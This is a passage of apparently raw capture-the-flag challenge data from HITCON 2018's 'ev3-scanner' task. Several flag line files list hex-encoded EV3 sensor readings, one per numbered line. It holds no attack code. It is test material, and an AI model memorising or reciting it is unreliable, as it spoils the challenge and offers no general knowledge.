07002a00020000c040 71 | 07002a00020000c040 72 | 07002a00020000c040 73 | 07002a00020000c040 74 | 07002a00020000c040 75 | 07002a00020000c040 76 | 07002a00020000c040 77 | 07002a00020000803f 78 | 07002a000200000040 79 | 07002a00020000c040 80 | 07002a00020000c040 81 | 07002a00020000803f 82 | 07002a00020000803f 83 | 07002a00020000803f 84 | 07002a00020000803f 85 | 07002a00020000803f 86 | 07002a00020000803f 87 | 07002a000200008040 88 | 07002a00020000c040 89 | 07002a00020000c040 90 | 07002a00020000803f 91 | 07002a00020000803f 92 | 07002a00020000803f 93 | 07002a00020000803f 94 | 07002a00020000803f 95 | 07002a00020000803f 96 | 07002a00020000803f 97 | 07002a00020000c040 98 | 07002a00020000c040 99 | 07002a00020000c040 100 | 07002a00020000803f 101 | 07002a00020000c040 102 | 07002a00020000c040 103 | 07002a00020000c040 104 | 07002a00020000c040 105 | 07002a00020000c040 106 | 07002a00020000803f 107 | 07002a00020000c040 108 | 07002a00020000c040 109 | 07002a000200004040 110 | 07002a00020000803f 111 | 07002a00020000803f 112 | 07002a00020000803f 113 | 07002a00020000803f 114 | 07002a00020000803f 115 | 07002a00020000803f 116 | 07002a00020000c040 117 | 07002a00020000c040 118 | 07002a00020000c040 119 | 07002a00020000803f 120 | 07002a00020000803f 121 | 07002a00020000803f 122 | 07002a00020000803f 123 | 07002a00020000803f 124 | 07002a00020000803f 125 | 07002a00020000803f 126 | 07002a000200000040 127 | 07002a00020000c040 128 | 07002a00020000c040 129 | 07002a00020000803f 130 | 07002a00020000803f 131 | 07002a00020000803f 132 | 07002a00020000803f 133 | 07002a00020000803f 134 | 07002a00020000803f 135 | 07002a00020000c040 136 | 07002a00020000c040 137 | 07002a00020000c040 138 | 07002a00020000803f 139 | 07002a00020000c040 140 | 07002a00020000c040 141 | 07002a00020000c040 142 | 07002a00020000c040 143 | 07002a00020000c040 144 | 07002a00020000803f 145 | 07002a00020000c040 146 | 07002a00020000c040 147 | 07002a00020000c040 148 | 07002a00020000803f 149 | 07002a00020000803f 150 | 07002a00020000803f 151 | 07002a00020000803f 152 | 07002a00020000803f 153 | 07002a00020000803f 154 | 07002a00020000c040 155 | 07002a00020000c040 156 | 07002a00020000c040 157 | 07002a00020000803f 158 | 07002a00020000c040 159 | 07002a00020000c040 160 | 07002a00020000c040 161 | 07002a00020000c040 162 | 07002a00020000803f 163 | 07002a00020000c040 164 | 07002a00020000c040 165 | 07002a00020000c040 166 | 07002a00020000803f 167 | 07002a00020000803f 168 | 07002a00020000803f 169 | 07002a00020000803f 170 | 07002a00020000803f 171 | 07002a00020000803f 172 | 07002a00020000c040 173 | 07002a00020000c040 174 | 07002a000200008040 175 | 07002a00020000803f 176 | 07002a00020000803f 177 | 07002a00020000803f 178 | 07002a00020000803f 179 | 07002a000200000040 180 | 07002a00020000c040 181 | 07002a00020000c040 182 | 07002a00020000c040 183 | 07002a00020000c040 184 | 07002a00020000c040 185 | 07002a00020000c040 186 | 07002a00020000c040 187 | 07002a00020000c040 188 | 07002a00020000c040 189 | 07002a00020000c040 -------------------------------------------------------------------------------- /hitcon2018/ev3-scanner/flag/line10.txt: -------------------------------------------------------------------------------- 1 | 07002a00020000c040 2 | 07002a00020000c040 3 | 07002a00020000c040 4 | 07002a00020000c040 5 | 07002a00020000c040 6 | 07002a00020000c040 7 | 07002a00020000803f 8 | 07002a00020000803f 9 | 07002a00020000c040 10 | 07002a00020000c040 11 | 07002a00020000c040 12 | 07002a00020000c040 13 | 07002a00020000c040 14 | 07002a00020000c040 15 | 07002a00020000803f 16 | 07002a00020000c040 17 | 07002a00020000c040 18 | 07002a00020000c040 19 | 07002a00020000c040 20 | 07002a00020000c040 21 | 07002a00020000c040 22 | 07002a00020000c040 23 | 07002a00020000c040 24 | 07002a00020000803f 25 | 07002a00020000803f 26 | 07002a00020000c040 27 | 07002a00020000c040 28 | 07002a00020000c040 29 | 07002a00020000803f 30 | 07002a00020000c040 31 | 07002a00020000c040 32 | 07002a00020000c040 33 | 07002a00020000c040 34 | 07002a00020000c040 35 | 07002a00020000c040 36 | 07002a00020000c040 37 | 07002a00020000c040 38 | 07002a00020000803f 39 | 07002a00020000c040 40 | 07002a00020000c040 41 | 07002a00020000c040 42 | 07002a00020000803f 43 | 07002a00020000c040 44 | 07002a00020000c040 45 | 07002a00020000c040 46 | 07002a00020000c040 47 | 07002a00020000c040 48 | 07002a00020000803f 49 | 07002a00020000c040 50 | 07002a00020000c040 51 | 07002a00020000c040 52 | 07002a00020000803f 53 | 07002a000200000040 54 | 07002a00020000c040 55 | 07002a00020000c040 56 | 07002a00020000c040 57 | 07002a00020000c040 58 | 07002a00020000c040 59 | 07002a00020000c040 60 | 07002a00020000c040 61 | 07002a00020000803f 62 | 07002a00020000c040 63 | 07002a00020000c040 64 | 07002a00020000c040 65 | 07002a00020000c040 66 | 07002a00020000c040 67 | 07002a00020000803f 68 | 07002a00020000c040 69 | 07002a00020000c040 70 | 07002a00020000c040 71 | 07002a000200004040 72 | 07002a00020000803f 73 | 07002a00020000c040 74 | 07002a00020000c040 75 | 07002a00020000c040 76 | 07002a000200004040 77 | 07002a00020000803f 78 | 07002a00020000c040 79 | 07002a00020000c040 80 | 07002a00020000c040 81 | 07002a00020000c040 82 | 07002a00020000c040 83 | 07002a00020000803f 84 | 07002a00020000c040 85 | 07002a00020000c040 86 | 07002a00020000c040 87 | 07002a00020000c040 88 | 07002a00020000c040 89 | 07002a00020000c040 90 | 07002a00020000803f 91 | 07002a00020000c040 92 | 07002a00020000c040 93 | 07002a00020000c040 94 | 07002a00020000c040 95 | 07002a000200004040 96 | 07002a00020000803f 97 | 07002a00020000c040 98 | 07002a00020000c040 99 | 07002a000200004040 100 | 07002a00020000803f 101 | 07002a00020000c040 102 | 07002a00020000c040 103 | 07002a00020000c040 104 | 07002a00020000c040 105 | 07002a00020000c040 106 | 07002a00020000c040 107 | 07002a00020000c040 108 | 07002a00020000c040 109 | 07002a00020000c040 110 | 07002a00020000c040 111 | 07002a00020000c040 112 | 07002a000200004040 113 | 07002a00020000803f 114 | 07002a00020000c040 115 | 07002a00020000803f 116 | 07002a00020000c040 117 | 07002a00020000c040 118 | 07002a00020000c040 119 | 07002a00020000c040 120 | 07002a00020000c040 121 | 07002a00020000c040 122 | 07002a00020000c040 123 | 07002a00020000c040 124 | 07002a00020000c040 125 | 07002a00020000c040 126 | 07002a00020000c040 127 | 07002a00020000c040 128 | 07002a00020000803f 129 | 07002a00020000c040 130 | 07002a00020000c040 131 | 07002a00020000c040 132 | 07002a00020000c040 133 | 07002a00020000c040 134 | 07002a00020000c040 135 | 07002a00020000803f 136 | 07002a00020000c040 137 | 07002a00020000c040 138 | 07002a00020000c040 139 | 07002a00020000c040 140 | 07002a00020000803f 141 | 07002a00020000803f 142 | 07002a00020000c040 143 | 07002a00020000c040 144 | 07002a00020000803f 145 | 07002a00020000803f 146 | 07002a00020000c040 147 | 07002a000200004040 148 | 07002a000200000040 149 | 07002a00020000c040 150 | 07002a00020000c040 151 | 07002a00020000c040 152 | 07002a00020000803f 153 | 07002a000200000040 154 | 07002a00020000c040 155 | 07002a00020000c040 156 | 07002a00020000c040 157 | 07002a00020000c040 158 | 07002a00020000c040 159 | 07002a00020000803f 160 | 07002a00020000c040 161 | 07002a00020000c040 162 | 07002a00020000c040 163 | 07002a00020000c040 164 | 07002a00020000c040 165 | 07002a00020000c040 166 | 07002a00020000c040 167 | 07002a000200004040 168 | 07002a00020000803f 169 | 07002a00020000c040 170 | 07002a00020000c040 171 | 07002a00020000c040 172 | 07002a00020000c040 173 | 07002a00020000803f 174 | 07002a000200000040 175 | 07002a00020000c040 176 | 07002a00020000c040 177 | 07002a00020000c040 178 | 07002a00020000803f 179 | 07002a000200000040 180 | 07002a00020000c040 181 | 07002a00020000c040 182 | 07002a00020000c040 183 | 07002a00020000803f 184 | 07002a00020000803f 185 | 07002a00020000c040 186 | 07002a000200008040 187 | 07002a000200008040 188 | 07002a000200008040 189 | 07002a000200008040 -------------------------------------------------------------------------------- /hitcon2018/ev3-scanner/flag/line11.txt: -------------------------------------------------------------------------------- 1 | 07002a000200008040 2 | 07002a000200008040 3 | 07002a000200008040 4 | 07002a00020000c040 5 | 07002a000200004040 6 | 07002a00020000803f 7 | 07002a00020000c040 8 | 07002a00020000c040 9 | 07002a00020000c040 10 | 07002a000200008040 11 | 07002a00020000803f 12 | 07002a00020000c040 13 | 07002a00020000c040 14 | 07002a00020000c040 15 | 07002a00020000803f 16 | 07002a00020000803f 17 | 07002a00020000c040 18 | 07002a00020000c040 19 | 07002a00020000c040 20 | 07002a00020000c040 21 | 07002a00020000803f 22 | 07002a00020000803f 23 | 07002a00020000803f 24 | 07002a00020000c040 25 | 07002a00020000c040 26 | 07002a00020000c040 27 | 07002a00020000c040 28 | 07002a00020000c040 29 | 07002a000200004040 30 | 07002a00020000803f 31 | 07002a00020000803f 32 | 07002a00020000803f 33 | 07002a00020000803f 34 | 07002a000200000040 35 | 07002a00020000c040 36 | 07002a00020000c040 37 | 07002a00020000803f 38 | 07002a00020000803f 39 | 07002a00020000803f 40 | 07002a00020000803f 41 | 07002a00020000803f 42 | 07002a00020000803f 43 | 07002a00020000c040 44 | 07002a00020000803f 45 | 07002a00020000803f 46 | 07002a00020000c040 47 | 07002a00020000c040 48 | 07002a00020000803f 49 | 07002a000200000040 50 | 07002a00020000c040 51 | 07002a00020000c040 52 | 07002a00020000c040 53 | 07002a00020000c040 54 | 07002a00020000803f 55 | 07002a00020000803f 56 | 07002a00020000803f 57 | 07002a00020000c040 58 | 07002a00020000c040 59 | 07002a00020000c040 60 | 07002a00020000c040 61 | 07002a00020000803f 62 | 07002a00020000803f 63 | 07002a00020000803f 64 | 07002a00020000803f 65 | 07002a00020000803f 66 | 07002a00020000803f 67 | 07002a000200000040 68 | 07002a00020000c040 69 | 07002a00020000c040 70 | 07002a00020000c040 71 | 07002a00020000c040 72 | 07002a00020000c040 73 | 07002a00020000c040 74 | 07002a00020000803f 75 | 07002a00020000803f 76 | 07002a000200008040 77 | 07002a00020000c040 78 | 07002a00020000c040 79 | 07002a00020000c040 80 | 07002a00020000c040 81 | 07002a00020000c040 82 | 07002a00020000c040 83 | 07002a00020000c040 84 | 07002a00020000803f 85 | 07002a00020000803f 86 | 07002a00020000803f 87 | 07002a00020000803f 88 | 07002a00020000803f 89 | 07002a00020000803f 90 | 07002a00020000c040 91 | 07002a00020000c040 92 | 07002a000200004040 93 | 07002a00020000803f 94 | 07002a00020000803f 95 | 07002a00020000803f 96 | 07002a00020000803f 97 | 07002a00020000803f 98 | 07002a00020000803f 99 | 07002a000200000040 100 | 07002a00020000c040 101 | 07002a00020000c040 102 | 07002a00020000c040 103 | 07002a00020000c040 104 | 07002a00020000c040 105 | 07002a000200004040 106 | 07002a000200000040 107 | 07002a00020000c040 108 | 07002a00020000c040 109 | 07002a00020000c040 110 | 07002a00020000c040 111 | 07002a00020000c040 112 | 07002a00020000803f 113 | 07002a00020000c040 114 | 07002a00020000c040 115 | 07002a00020000c040 116 | 07002a00020000c040 117 | 07002a000200004040 118 | 07002a00020000803f 119 | 07002a00020000c040 120 | 07002a00020000c040 121 | 07002a00020000803f 122 | 07002a00020000803f 123 | 07002a00020000803f 124 | 07002a00020000803f 125 | 07002a00020000803f 126 | 07002a00020000803f 127 | 07002a00020000803f 128 | 07002a00020000803f 129 | 07002a00020000c040 130 | 07002a00020000c040 131 | 07002a00020000803f 132 | 07002a00020000803f 133 | 07002a00020000803f 134 | 07002a00020000803f 135 | 07002a00020000803f 136 | 07002a00020000803f 137 | 07002a000200000040 138 | 07002a00020000c040 139 | 07002a00020000c040 140 | 07002a00020000803f 141 | 07002a00020000803f 142 | 07002a00020000803f 143 | 07002a00020000803f 144 | 07002a00020000803f 145 | 07002a00020000803f 146 | 07002a00020000803f 147 | 07002a00020000803f 148 | 07002a00020000c040 149 | 07002a00020000c040 150 | 07002a000200008040 151 | 07002a00020000803f 152 | 07002a00020000803f 153 | 07002a00020000803f 154 | 07002a00020000803f 155 | 07002a00020000803f 156 | 07002a00020000803f 157 | 07002a00020000c040 158 | 07002a00020000c040 159 | 07002a000200008040 160 | 07002a00020000803f 161 | 07002a00020000c040 162 | 07002a00020000c040 163 | 07002a00020000c040 164 | 07002a00020000c040 165 | 07002a000200008040 166 | 07002a00020000803f 167 | 07002a00020000c040 168 | 07002a00020000c040 169 | 07002a00020000803f 170 | 07002a00020000803f 171 | 07002a00020000803f 172 | 07002a00020000803f 173 | 07002a00020000803f 174 | 07002a00020000803f 175 | 07002a00020000c040 176 | 07002a00020000c040 177 | 07002a00020000803f 178 | 07002a00020000803f 179 | 07002a00020000803f 180 | 07002a00020000803f 181 | 07002a00020000803f 182 | 07002a00020000c040 183 | 07002a00020000c040 184 | 07002a00020000c040 185 | 07002a00020000c040 186 | 07002a00020000c040 187 | 07002a00020000c040 188 | 07002a00020000c040 189 | 07002a00020000c040 -------------------------------------------------------------------------------- /hitcon2018/ev3-scanner/flag/line12.txt: -------------------------------------------------------------------------------- 1 | 07002a00020000c040 2 | 07002a00020000c040 3 | 07002a00020000c040 4 | 07002a00020000c040 5 | 07002a00020000c040 6 | 07002a00020000c040 7 | 07002a00020000c040 8 | 07002a00020000c040 9 | 07002a00020000c040 10 | 07002a00020000c040 11 | 07002a00020000c040 12 | 07002a00020000c040 13 | 07002a00020000c040 14 | 07002a00020000c040 15 | 07002a00020000c040 16 | 07002a00020000c040 17 | 07002a00020000c040 18 | 07002a00020000c040 19 | 07002a00020000c040 20 | 07002a00020000c040 21 | 07002a00020000c040 22 | 07002a00020000c040 23 | 07002a00020000c040 24 | 07002a00020000c040 25 | 07002a00020000c040 26 | 07002a00020000c040 27 | 07002a00020000c040 28 | 07002a00020000c040 29 | 07002a00020000c040 30 | 07002a00020000c040 31 | 07002a00020000c040 32 | 07002a00020000c040 33 | 07002a00020000c040 34 | 07002a00020000c040 35 | 07002a00020000c040 36 | 07002a00020000c040 37 | 07002a00020000c040 38 | 07002a00020000c040 39 | 07002a00020000c040 40 | 07002a00020000c040 41 | 07002a00020000c040 42 | 07002a00020000c040 43 | 07002a00020000c040 44 | 07002a00020000c040 45 | 07002a00020000c040 46 | 07002a00020000c040 47 | 07002a00020000c040 48 | 07002a00020000c040 49 | 07002a00020000c040 50 | 07002a00020000c040 51 | 07002a00020000c040 52 | 07002a00020000c040 53 | 07002a00020000c040 54 | 07002a00020000c040 55 | 07002a00020000c040 56 | 07002a00020000c040 57 | 07002a00020000c040 58 | 07002a00020000c040 59 | 07002a00020000c040 60 | 07002a00020000c040 61 | 07002a00020000c040 62 | 07002a00020000c040 63 | 07002a00020000c040 64 | 07002a00020000c040 65 | 07002a00020000c040 66 | 07002a00020000c040 67 | 07002a00020000c040 68 | 07002a00020000c040 69 | 07002a00020000c040 70 | 07002a00020000c040 71 | 07002a00020000c040 72 | 07002a00020000c040 73 | 07002a00020000c040 74 | 07002a00020000c040 75 | 07002a00020000c040 76 | 07002a00020000c040 77 | 07002a00020000c040 78 | 07002a00020000c040 79 | 07002a00020000c040 80 | 07002a00020000c040 81 | 07002a00020000c040 82 | 07002a00020000c040 83 | 07002a00020000c040 84 | 07002a00020000c040 85 | 07002a00020000c040 86 | 07002a00020000c040 87 | 07002a00020000c040 88 | 07002a00020000c040 89 | 07002a00020000c040 90 | 07002a00020000c040 91 | 07002a00020000c040 92 | 07002a00020000c040 93 | 07002a00020000c040 94 | 07002a00020000c040 95 | 07002a00020000c040 96 | 07002a00020000c040 97 | 07002a00020000c040 98 | 07002a00020000c040 99 | 07002a00020000c040 100 | 07002a00020000c040 101 | 07002a00020000c040 102 | 07002a00020000c040 103 | 07002a00020000c040 104 | 07002a00020000c040 105 | 07002a00020000c040 106 | 07002a00020000c040 107 | 07002a00020000c040 108 | 07002a00020000c040 109 | 07002a00020000c040 110 | 07002a00020000c040 111 | 07002a00020000c040 112 | 07002a00020000c040 113 | 07002a00020000c040 114 | 07002a00020000c040 115 | 07002a00020000c040 116 | 07002a00020000c040 117 | 07002a00020000c040 118 | 07002a00020000c040 119 | 07002a00020000c040 120 | 07002a00020000c040 121 | 07002a00020000c040 122 | 07002a00020000c040 123 | 07002a00020000c040 124 | 07002a00020000c040 125 | 07002a00020000c040 126 | 07002a00020000c040 127 | 07002a00020000c040 128 | 07002a00020000c040 129 | 07002a00020000c040 130 | 07002a00020000c040 131 | 07002a00020000c040 132 | 07002a00020000c040 133 | 07002a00020000c040 134 | 07002a00020000c040 135 | 07002a00020000c040 136 | 07002a00020000c040 137 | 07002a00020000c040 138 | 07002a00020000c040 139 | 07002a00020000c040 140 | 07002a00020000c040 141 | 07002a00020000c040 142 | 07002a00020000c040 143 | 07002a00020000c040 144 | 07002a00020000c040 145 | 07002a00020000c040 146 | 07002a00020000c040 147 | 07002a00020000c040 148 | 07002a00020000c040 149 | 07002a00020000c040 150 | 07002a00020000c040 151 | 07002a00020000c040 152 | 07002a00020000c040 153 | 07002a00020000c040 154 | 07002a00020000c040 155 | 07002a00020000c040 156 | 07002a00020000c040 157 | 07002a00020000c040 158 | 07002a00020000c040 159 | 07002a00020000c040 160 | 07002a00020000c040 161 | 07002a00020000c040 162 | 07002a00020000c040 163 | 07002a00020000c040 164 | 07002a00020000c040 165 | 07002a00020000c040 166 | 07002a00020000c040 167 | 07002a00020000c040 168 | 07002a00020000c040 169 | 07002a00020000c040 170 | 07002a00020000c040 171 | 07002a00020000c040 172 | 07002a00020000c040 173 | 07002a00020000c040 174 | 07002a00020000c040 175 | 07002a00020000c040 176 | 07002a00020000c040 177 | 07002a00020000c040 178 | 07002a00020000c040 179 | 07002a00020000c040 180 | 07002a00020000c040 181 | 07002a00020000c040 182 | 07002a00020000c040 183 | 07002a00020000c040 184 | 07002a00020000c040 185 | 07002a00020000c040 186 | 07002a00020000c040 187 | 07002a00020000c040 188 | 07002a00020000c040 189 | 07002a000200008040 -------------------------------------------------------------------------------- /hitcon2018/ev3-scanner/flag/line2.txt: -------------------------------------------------------------------------------- 1 | 07002a00020000c040 2 | 07002a00020000c040 3 | 07002a00020000c040 4 | 07002a00020000c040 5 | 07002a00020000c040 6 | 07002a00020000c040 7 | 07002a00020000c040 8 | 07002a00020000c040 9 | 07002a000200008040 10 | 07002a00020000803f 11 | 07002a00020000c040 12 | 07002a00020000c040 13 | 07002a00020000c040 14 | 07002a00020000c040 15 | 07002a00020000c040 16 | 07002a00020000c040 17 | 07002a00020000c040 18 | 07002a00020000c040 19 | 07002a00020000c040 20 | 07002a00020000c040 21 | 07002a00020000c040 22 | 07002a00020000803f 23 | 07002a000200000040 24 | 07002a00020000c040 25 | 07002a00020000c040 26 | 07002a00020000c040 27 | 07002a00020000803f 28 | 07002a000200000040 29 | 07002a00020000c040 30 | 07002a00020000c040 31 | 07002a00020000803f 32 | 07002a000200000040 33 | 07002a00020000c040 34 | 07002a00020000c040 35 | 07002a00020000c040 36 | 07002a00020000c040 37 | 07002a00020000c040 38 | 07002a00020000c040 39 | 07002a00020000c040 40 | 07002a00020000803f 41 | 07002a00020000c040 42 | 07002a00020000c040 43 | 07002a00020000c040 44 | 07002a00020000803f 45 | 07002a00020000c040 46 | 07002a00020000c040 47 | 07002a00020000c040 48 | 07002a00020000c040 49 | 07002a00020000c040 50 | 07002a00020000803f 51 | 07002a000200000040 52 | 07002a00020000c040 53 | 07002a00020000c040 54 | 07002a00020000c040 55 | 07002a00020000c040 56 | 07002a00020000c040 57 | 07002a00020000c040 58 | 07002a00020000c040 59 | 07002a00020000803f 60 | 07002a000200000040 61 | 07002a00020000c040 62 | 07002a00020000c040 63 | 07002a00020000803f 64 | 07002a00020000c040 65 | 07002a00020000c040 66 | 07002a00020000c040 67 | 07002a00020000c040 68 | 07002a000200004040 69 | 07002a00020000803f 70 | 07002a00020000c040 71 | 07002a00020000c040 72 | 07002a00020000c040 73 | 07002a00020000803f 74 | 07002a00020000c040 75 | 07002a00020000c040 76 | 07002a00020000c040 77 | 07002a00020000c040 78 | 07002a000200004040 79 | 07002a000200000040 80 | 07002a00020000c040 81 | 07002a00020000c040 82 | 07002a000200008040 83 | 07002a00020000803f 84 | 07002a00020000c040 85 | 07002a00020000c040 86 | 07002a00020000c040 87 | 07002a00020000803f 88 | 07002a000200000040 89 | 07002a00020000c040 90 | 07002a00020000c040 91 | 07002a00020000c040 92 | 07002a00020000c040 93 | 07002a00020000c040 94 | 07002a00020000c040 95 | 07002a00020000c040 96 | 07002a00020000c040 97 | 07002a00020000c040 98 | 07002a00020000803f 99 | 07002a00020000c040 100 | 07002a00020000c040 101 | 07002a00020000c040 102 | 07002a00020000803f 103 | 07002a00020000c040 104 | 07002a00020000c040 105 | 07002a00020000c040 106 | 07002a00020000c040 107 | 07002a00020000c040 108 | 07002a00020000c040 109 | 07002a00020000c040 110 | 07002a00020000c040 111 | 07002a00020000803f 112 | 07002a00020000c040 113 | 07002a00020000c040 114 | 07002a00020000c040 115 | 07002a00020000c040 116 | 07002a00020000c040 117 | 07002a00020000c040 118 | 07002a00020000c040 119 | 07002a000200004040 120 | 07002a00020000803f 121 | 07002a00020000c040 122 | 07002a00020000c040 123 | 07002a00020000c040 124 | 07002a00020000c040 125 | 07002a00020000c040 126 | 07002a00020000c040 127 | 07002a00020000c040 128 | 07002a00020000c040 129 | 07002a00020000803f 130 | 07002a00020000803f 131 | 07002a00020000c040 132 | 07002a00020000c040 133 | 07002a00020000c040 134 | 07002a00020000c040 135 | 07002a00020000c040 136 | 07002a00020000803f 137 | 07002a000200000040 138 | 07002a00020000c040 139 | 07002a00020000c040 140 | 07002a00020000c040 141 | 07002a00020000c040 142 | 07002a00020000c040 143 | 07002a00020000c040 144 | 07002a00020000c040 145 | 07002a00020000c040 146 | 07002a00020000c040 147 | 07002a00020000c040 148 | 07002a00020000c040 149 | 07002a00020000c040 150 | 07002a00020000c040 151 | 07002a00020000c040 152 | 07002a00020000c040 153 | 07002a00020000c040 154 | 07002a00020000c040 155 | 07002a00020000c040 156 | 07002a00020000c040 157 | 07002a00020000c040 158 | 07002a00020000c040 159 | 07002a00020000c040 160 | 07002a00020000c040 161 | 07002a00020000c040 162 | 07002a00020000c040 163 | 07002a00020000c040 164 | 07002a00020000c040 165 | 07002a00020000c040 166 | 07002a00020000c040 167 | 07002a00020000c040 168 | 07002a00020000803f 169 | 07002a00020000c040 170 | 07002a00020000c040 171 | 07002a00020000c040 172 | 07002a00020000c040 173 | 07002a00020000c040 174 | 07002a00020000803f 175 | 07002a00020000c040 176 | 07002a00020000c040 177 | 07002a00020000c040 178 | 07002a00020000c040 179 | 07002a00020000c040 180 | 07002a00020000c040 181 | 07002a00020000c040 182 | 07002a00020000c040 183 | 07002a000200004040 184 | 07002a00020000803f 185 | 07002a00020000c040 186 | 07002a00020000c040 187 | 07002a000200008040 188 | 07002a000200008040 189 | 07002a000200008040 -------------------------------------------------------------------------------- /hitcon2018/ev3-scanner/flag/line3.txt: -------------------------------------------------------------------------------- 1 | 07002a000200008040 2 | 07002a00020000c040 3 | 07002a00020000c040 4 | 07002a00020000803f 5 | 07002a00020000c040 6 | 07002a00020000c040 7 | 07002a00020000c040 8 | 07002a00020000c040 9 | 07002a00020000c040 10 | 07002a00020000c040 11 | 07002a00020000c040 12 | 07002a00020000c040 13 | 07002a00020000c040 14 | 07002a00020000c040 15 | 07002a00020000c040 16 | 07002a00020000c040 17 | 07002a00020000c040 18 | 07002a00020000803f 19 | 07002a00020000803f 20 | 07002a00020000803f 21 | 07002a00020000803f 22 | 07002a00020000803f 23 | 07002a00020000c040 24 | 07002a00020000c040 25 | 07002a00020000c040 26 | 07002a00020000c040 27 | 07002a00020000c040 28 | 07002a00020000c040 29 | 07002a00020000c040 30 | 07002a00020000c040 31 | 07002a00020000c040 32 | 07002a00020000c040 33 | 07002a00020000c040 34 | 07002a00020000c040 35 | 07002a00020000c040 36 | 07002a00020000c040 37 | 07002a00020000c040 38 | 07002a00020000c040 39 | 07002a00020000c040 40 | 07002a00020000c040 41 | 07002a00020000c040 42 | 07002a00020000c040 43 | 07002a00020000c040 44 | 07002a00020000c040 45 | 07002a00020000c040 46 | 07002a00020000c040 47 | 07002a00020000c040 48 | 07002a00020000c040 49 | 07002a00020000c040 50 | 07002a00020000c040 51 | 07002a00020000c040 52 | 07002a000200004040 53 | 07002a00020000803f 54 | 07002a00020000c040 55 | 07002a00020000c040 56 | 07002a00020000c040 57 | 07002a00020000c040 58 | 07002a00020000c040 59 | 07002a00020000803f 60 | 07002a00020000803f 61 | 07002a00020000c040 62 | 07002a00020000c040 63 | 07002a00020000c040 64 | 07002a00020000c040 65 | 07002a00020000c040 66 | 07002a00020000c040 67 | 07002a00020000c040 68 | 07002a00020000c040 69 | 07002a00020000803f 70 | 07002a00020000803f 71 | 07002a00020000c040 72 | 07002a00020000c040 73 | 07002a00020000c040 74 | 07002a00020000c040 75 | 07002a00020000c040 76 | 07002a00020000c040 77 | 07002a00020000803f 78 | 07002a000200000040 79 | 07002a00020000c040 80 | 07002a00020000c040 81 | 07002a00020000c040 82 | 07002a00020000c040 83 | 07002a00020000c040 84 | 07002a00020000c040 85 | 07002a00020000c040 86 | 07002a00020000c040 87 | 07002a000200004040 88 | 07002a00020000803f 89 | 07002a00020000c040 90 | 07002a00020000c040 91 | 07002a00020000803f 92 | 07002a000200000040 93 | 07002a00020000c040 94 | 07002a00020000c040 95 | 07002a00020000c040 96 | 07002a00020000c040 97 | 07002a00020000c040 98 | 07002a00020000c040 99 | 07002a00020000c040 100 | 07002a00020000c040 101 | 07002a00020000c040 102 | 07002a000200008040 103 | 07002a00020000803f 104 | 07002a00020000c040 105 | 07002a00020000c040 106 | 07002a00020000803f 107 | 07002a00020000c040 108 | 07002a00020000c040 109 | 07002a00020000c040 110 | 07002a00020000c040 111 | 07002a00020000803f 112 | 07002a00020000c040 113 | 07002a00020000c040 114 | 07002a00020000c040 115 | 07002a00020000c040 116 | 07002a00020000803f 117 | 07002a00020000803f 118 | 07002a00020000c040 119 | 07002a00020000c040 120 | 07002a00020000c040 121 | 07002a00020000803f 122 | 07002a00020000c040 123 | 07002a00020000c040 124 | 07002a00020000c040 125 | 07002a00020000c040 126 | 07002a00020000c040 127 | 07002a00020000803f 128 | 07002a00020000c040 129 | 07002a00020000c040 130 | 07002a000200008040 131 | 07002a00020000803f 132 | 07002a00020000c040 133 | 07002a00020000c040 134 | 07002a00020000c040 135 | 07002a00020000c040 136 | 07002a00020000c040 137 | 07002a00020000c040 138 | 07002a00020000c040 139 | 07002a00020000c040 140 | 07002a00020000803f 141 | 07002a00020000c040 142 | 07002a00020000c040 143 | 07002a00020000c040 144 | 07002a00020000c040 145 | 07002a00020000c040 146 | 07002a00020000803f 147 | 07002a00020000c040 148 | 07002a00020000c040 149 | 07002a00020000c040 150 | 07002a00020000803f 151 | 07002a00020000c040 152 | 07002a00020000c040 153 | 07002a00020000c040 154 | 07002a00020000c040 155 | 07002a00020000c040 156 | 07002a00020000c040 157 | 07002a00020000c040 158 | 07002a00020000c040 159 | 07002a00020000803f 160 | 07002a000200000040 161 | 07002a00020000803f 162 | 07002a00020000803f 163 | 07002a00020000c040 164 | 07002a00020000c040 165 | 07002a00020000c040 166 | 07002a00020000c040 167 | 07002a00020000c040 168 | 07002a00020000803f 169 | 07002a00020000c040 170 | 07002a00020000c040 171 | 07002a00020000c040 172 | 07002a00020000c040 173 | 07002a00020000c040 174 | 07002a00020000c040 175 | 07002a00020000c040 176 | 07002a00020000c040 177 | 07002a00020000c040 178 | 07002a00020000c040 179 | 07002a00020000c040 180 | 07002a00020000803f 181 | 07002a000200000040 182 | 07002a00020000c040 183 | 07002a00020000c040 184 | 07002a00020000c040 185 | 07002a00020000c040 186 | 07002a00020000c040 187 | 07002a00020000c040 188 | 07002a00020000c040 189 | 07002a00020000c040 -------------------------------------------------------------------------------- /hitcon2018/ev3-scanner/flag/line4.txt: -------------------------------------------------------------------------------- 1 | 07002a00020000c040 2 | 07002a00020000c040 3 | 07002a00020000c040 4 | 07002a00020000c040 5 | 07002a00020000c040 6 | 07002a00020000c040 7 | 07002a000200008040 8 | 07002a00020000803f 9 | 07002a00020000803f 10 | 07002a00020000803f 11 | 07002a00020000c040 12 | 07002a00020000c040 13 | 07002a00020000c040 14 | 07002a00020000c040 15 | 07002a00020000c040 16 | 07002a000200008040 17 | 07002a00020000803f 18 | 07002a00020000803f 19 | 07002a00020000803f 20 | 07002a00020000803f 21 | 07002a00020000803f 22 | 07002a00020000803f 23 | 07002a00020000c040 24 | 07002a00020000c040 25 | 07002a00020000c040 26 | 07002a00020000c040 27 | 07002a00020000c040 28 | 07002a00020000c040 29 | 07002a00020000803f 30 | 07002a00020000803f 31 | 07002a00020000803f 32 | 07002a00020000c040 33 | 07002a00020000c040 34 | 07002a00020000c040 35 | 07002a00020000c040 36 | 07002a00020000c040 37 | 07002a00020000c040 38 | 07002a00020000c040 39 | 07002a00020000803f 40 | 07002a00020000803f 41 | 07002a00020000c040 42 | 07002a00020000c040 43 | 07002a00020000c040 44 | 07002a00020000803f 45 | 07002a00020000c040 46 | 07002a00020000c040 47 | 07002a00020000c040 48 | 07002a00020000c040 49 | 07002a000200008040 50 | 07002a00020000803f 51 | 07002a00020000c040 52 | 07002a00020000c040 53 | 07002a00020000c040 54 | 07002a00020000803f 55 | 07002a00020000803f 56 | 07002a00020000803f 57 | 07002a00020000803f 58 | 07002a00020000803f 59 | 07002a00020000803f 60 | 07002a00020000c040 61 | 07002a00020000c040 62 | 07002a00020000803f 63 | 07002a000200008040 64 | 07002a00020000c040 65 | 07002a00020000c040 66 | 07002a00020000c040 67 | 07002a00020000c040 68 | 07002a00020000803f 69 | 